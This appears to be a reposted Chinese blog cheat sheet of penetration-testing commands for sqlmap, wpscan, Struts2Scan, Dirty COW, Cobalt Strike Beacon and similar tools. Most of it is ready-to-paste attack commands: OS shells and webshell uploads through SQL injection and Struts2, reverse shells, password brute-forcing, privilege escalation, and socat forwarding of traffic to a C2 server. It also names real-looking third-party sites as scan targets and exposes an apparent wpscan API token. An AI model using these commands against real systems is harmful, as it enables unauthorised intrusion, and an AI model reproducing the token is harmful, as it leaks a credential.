各種滲透小工具常用命令參數總結


滲透過程中用到很多小工具:有的時候指令參數感覺比較難記,去搜還比較費時間,所以想了一個小辦法提高效率,把常用的參數本地記下來,時不時看一看,或者用的時候直接修改貼上去就行,如下:(本機環境python默認為python3,python2為python2)

sqlmap    
	常用指令:
		--identify-waf  sqlmap安全狗試探
		--technique  B E U S T
		--random-agent --dbs   --delay 2 -v 3 --risk 3  --batch  
		–os-pwn 聯動MSF反彈shell   
		sqlmap -d "mssql://uset:password@ip:port/dbname" --os-shell  外連數據庫操作命令
		--os-shell  寫入webshell或者命令shell 默認會有一個命令文件和上傳文件
		python sqlmap.py -u "hid=1" --file-dest="E://php///phpinfo.php寫入目標路徑" --file-write="E:/WWW//phpinfo.php本地shell路徑"  寫之前先看dba --privileges
	繞過防護:--tamper
		WTS:and換成&& symboliclogical.py  
		
sublist3r   目錄爆破 python2.7  python3.4   
		python2 sublist3r.py -b -v -d  lzu.edu.cn -p 80,443   -t 50 -o lzu.txt
OneForAll  子域名收集  py3.7    
		oneforall模塊:
		python oneforall.py --target 1.txt --format=txt  --brute=true run
dirmap 
		單目標  python dirmap.py -i https://target.com -lcf       python dirmap.py -i 192.168.1.1 -lcf
		子網    python dirmap.py -i 192.168.1.0/24 -lcf    python dirmap.py -i 192.168.1.1-192.168.1.100 -lcf
		文件讀取  python dirmap.py -iF targets.txt -lcf  
		
Arjun   請求參數fuzz工具:一般參數fuzz可以從JS中找到  py3
    單個URL:python arjun.py -u https://api.example.com/endpoint --get     或者--post     -t 22 多線程  -d 2延遲
    多個URL:python arjun.py --urls targets.txt --get            --include '{"api_key":"xxxxx"}'API密鑰
	對HTTP參數進行fuzz  py>3.4  -t 20 設置線程  --headers  加請求頭
	python arjun.py -u https://api.example.com/endpoint --get/--post  不同請求
	python arjun.py -u https://api.example.com/endpoint --get -d 2    延擱請求發送時間
	python arjun.py -u https://api.example.com/endpoint --get --include 'api_key=xxxxx'  引入固定數據
	
nmap  
	常用命令:
		nmap -sS -iL sub_domain.txt -oX school.xml   批量掃描后輸出
		nmap -p 25 --script smtp-enum-users.nse 202.38.193.203   25端口 郵箱枚舉
		
wpscan    https://wpvulndb.com/users/edit    --force | -f   不檢查網站運行的是不是`WordPress`
		wpscan --url https://wp.tutorabc.com/ -e --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I    #-e簡單進行整體快速掃描
		wpscan --url http://10.10.10.10 --enumerate vp --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I   簡單掃描WP插件
		wpscan --url https://intro.vipjr.com --enumerate ap --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I  完整掃描WP插件
		wpscan --url http://10.10.10.10  --enumerate u 枚舉WP用戶名
		wpsan --url http://10.10.10.10 --enumerate vt  掃描所使用的主題和漏洞
		wpscan -u https://www.xxxxxx.wiki/ -enumerate tt    TimThumbs文件漏洞掃描
		wpscan --url http://10.10.10.128/wordpress -P /root/Desktop/xray/rockyou.txt -U admin -t 100 #指定用戶名為admin,密碼為 /root/Desktop/xray/rockyou.txt 字典文件中的數據 設置線程100

xray  
xray.exe  webscan --listen 127.0.0.1:1111 --html-output awvs.html  聯動
xray.exe  webscan --basic-crawler http://testphp.vulnweb.com/ --html-output xray-crawler.html   爬蟲自動挖

Crawlergo   targets.txt 里面的地址放http://testphp.vulnweb.com/這個格式
python launcher_new.py

Struts2-Scan: py3
	python Struts2Scan.py --info  查看信息
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action   單個檢測
	python Struts2Scan.py -f urls.txt   批量檢測
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --exec   指定漏洞 命令執行
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --reverse 192.168.100.8:8888  反彈shell
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --webpath  獲取web路徑
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp  上傳shell
	
WebCrack.py  py3 后台爆破 不支持驗證碼  爆破結果:web_crack_ok.txt
	python WebCrack.py  
	輸入文件名則進行批量爆破,輸入URL則進行單域名爆破
		
Docker  docker version	docker info	docker --help
	鏡像命令
		docker images 查看所有鏡像
		docker search “tomcat”    或從http://hub.docker.com查
		docker pull tomcat   下載鏡像
		docker rmi tomcat    刪除鏡像
	容器命令
		docker run -it --tomcat 運行
		docker run -p 8080:8080 鏡像名   端口映射執行
		docker ps -a   列出正在運行的容器
		docker ps -aq  列出正在運行的容器ID  
		exit 容器停止並退出
		docker start 容器ID 啟動容器
		docker restart 容器ID 重啟容器
		docker stop 容器ID 停止容器
		docker stop $(docker ps -aq)   停止所有容器
		docker attach 容器ID     直接進入容器啟動命令的終端,不會啟動新的進程
		docker cp mycontainer:/opt/file.txt /opt/local/    復制文件
		docker-compose down        環境移除
		docker image prune -f -a   刪除所有暫時不使用的鏡像
		docker container prune -f  刪除所有停止的鏡像
		docker-compose run --rm -p 8080:80 web  docker容器端口映射
		docker network prune   不被docker使用的network都將被清理掉
		   
	docker exec -ti name /bin/bash   進入docker容器查看	
	殺死占用端口命令:
	kill -9 $(lsof -i tcp:進程號 -t)
	sudo kill -s 9 $(lsof -i:端口號 -t)
	docker ps |awk '{print($1)}' |xargs -n 1 docker stop   		

臟牛提權:dirty.c  大於2.6.22版本(Linux bogon)
		查看版本:uname -a
		編譯:gcc -pthread dirty.c -o dirty -lcrypt
		執行: ./dirty  低權限用戶名
kali搜索版本漏洞:searchsploit  ubuntu 16


CS4.0
傳輸器 傳輸體
監聽器(Beacon Foreign )Beacon是CS的Payload
Beacon有兩種通信模式。(異步通信模式/交互式通信模式)
Beacon的類型(HTTP 和 HTTPS Beacon/DNS Beacon/SMB Beacon)
重定向器(目標靶機 <-------->多個並列的重定向器<------>CS服務器)
socat TCP4-LISTEN:9999,fork TCP4:158.247.199.169:9999  socat轉發流量到CS服務器

Beacon 命令
help 			查看beacon shell所有內置命令幫助,如果想查看指定命令的用法,可以這樣,eg: help checkin
note 			給當前目錄機器起個名字, eg: note beacon-shell
cd			在目標系統中切換目錄,注意在win系統中切換目錄要用雙反斜杠,或者直接用'/' eg: cd c:\\
mkdir 			新建目錄, eg: mkdir d:\\beacon
rm 			刪除文件或目錄, eg: rm d:\\beacon
upload 			上傳文件到目標系統中
download		從目標系統下載指定文件,eg: download C:\\Users\\win7cn\\Desktop\\putty.exe
cancel			取消下載任務,比如,一個文件如果特別大,下載可能會非常耗時,假如中途你不想繼續下了,就可以用這個取消一下
shell			在目標系統中執行指定的cmd命令, eg: shell whoami
getuid 			查看當前beacon 會話在目標系統中的用戶權限,可能需要bypassuac或者提權
pwd			查看當前在目錄系統中的路徑
ls			列出當前目錄下的所有文件和目錄
drives			列表出目標系統的所有分區[win中叫盤符]
ps			查看目標系統當前的所有的進程列表
kill			殺掉指定進程, eg: kill 4653
sleep 10		指定被控端休眠時間,默認60秒一次回傳,讓被控端每10秒來下載一次任務,實際中頻率不宜過快,容易被發現,80左右一次即可
jobs			列出所有的任務列表,有些任務執行時間可能稍微較長,此時就可以從任務列表中看到其所對應的具體任務id,針對性的清除
jobkill			如果發現任務不知是何原因長時間沒有執行或者異常,可嘗試用此命令直接結束該任務, eg: jobkill 1345
clear			清除beacon內部的任務隊列
checkin			強制讓被控端回連一次
exit 			終止當前beacon 會話
ctrl + k 		清屏
checkin         激活beacon 使其回連
help mode       查看傳輸模式
mode dns        傳輸模式-dns(每次傳輸4比特數據)
mode dns-txt    切換傳輸模式-dns-txt(每次傳輸189比特數據)

	
WeblogicScan  python3
python WeblogicScan.py -u 127.0.0.1 -p 7001  單點
python WeblogicScan.py -f target.txt 批量  txt格式127.0.0.1:7001  或127.0.0.1 或127.0.0.1:700


命令行終端下載:
wget -b http://www.sample-videos.com/video/mp4/big.mp4  隱藏下載
curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4  下載重命名
python:
#!python
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
Netcat 
cat file | nc -l 1234    攻擊機將文件放到1234端口  
nc host_ip 1234 > file   目標機連接該端口就會接收到
powershell:
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file" "C:\%homepath%\file")

http://xl.bhcy.cn/addme.asp


python atlas.py --url http://eci-2zedsrkf2aml8sk5i8w3.cloudeci1.ichunqiu.com/?id=%%1%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v


Nginx 配置
	sudo systemctl stop nginx  
	systemctl start nginx
	systemctl restart nginx
	systemctl reload nginx   一些配置更改后,重新加載Nginx服務
	systemctl disable nginx  禁止Nginx服務在服務器啟動時啟動


netstat -tulnp | grep ":53"             看端口是否被占用
netstat -ntlp                           查看端口使用情況
service iptables status  	
iptables -A INPUT -ptcp --dport  53  -j ACCEPT   開端口

  持續更新,算個小分享和學習方法分享吧


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM